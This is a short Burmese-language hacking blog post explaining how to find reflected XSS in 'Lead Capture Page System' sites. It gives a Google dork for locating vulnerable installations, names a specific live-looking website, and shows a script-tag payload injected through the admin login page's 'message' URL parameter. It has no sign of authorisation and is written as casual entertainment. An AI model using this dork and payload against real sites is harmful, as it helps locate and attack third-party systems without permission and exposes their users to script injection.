Lead Capture Page System XSS vulnerability

XSS အေႀကာင္းလဲ မေရးရတာႀကာျပီ... ဒီေတာ့ အပ်င္းေျပေလးေပါ့ဗ်ာ.... ကဲ  Dork ေလး run ႀကည့္

intext:"Powered By Lead Capture Page System"

ႀကိဳက္တဲ့ဆိုက္တစ္ခု ၀င္လိုက္ဗ်ာ...  ကြ်န္ေတာ္က http://teameliteresponder.com ကို၀င္လိုက္ျပီ
အဲဆိုက္ကို http://teameliteresponder.com/admin/login.php အဲကိုသြားလိုက္
Login ၀င္စရာ Email နဲ့ password ထည့္ရမယ့္ေနရာ ေတြ ့လိမ့္မယ္... ဘာထည့္ရမလဲ စဥ္းစားမေနနဲ့ 
msys  လို့ထည့္လိုက္ (ထည့္ခ်င္တာထည့္) ႏွစ္ခုလံုး ႀကိဳက္တာထည့္ဗ်ာ....
Login Error ဆိုတဲ့ message ေလးရလိမ့္မယ္... ေႀကာင္မေနနဲ့  URL ကိုႀကည့္လိုက္ဦး

http://teameliteresponder.com/admin/login.php?message=The%20login%20info%20you%20provided%20is%20not%20correct.%20%20Please%20try%20again.

/login.php?message= ေနာက္က ဟာအကုန္ဖ်က္လိုက္ဒီဟာေလးထည့္စမ္းႀကည့္

<script> alert("msys");</script>

Bingo!!! We got it!

Please Give Us Your 1 Minute In Sharing This Post!

SOCIALIZE IT →

Tweet

FOLLOW US →

SHARE IT →

Powered By: BloggerYard.Com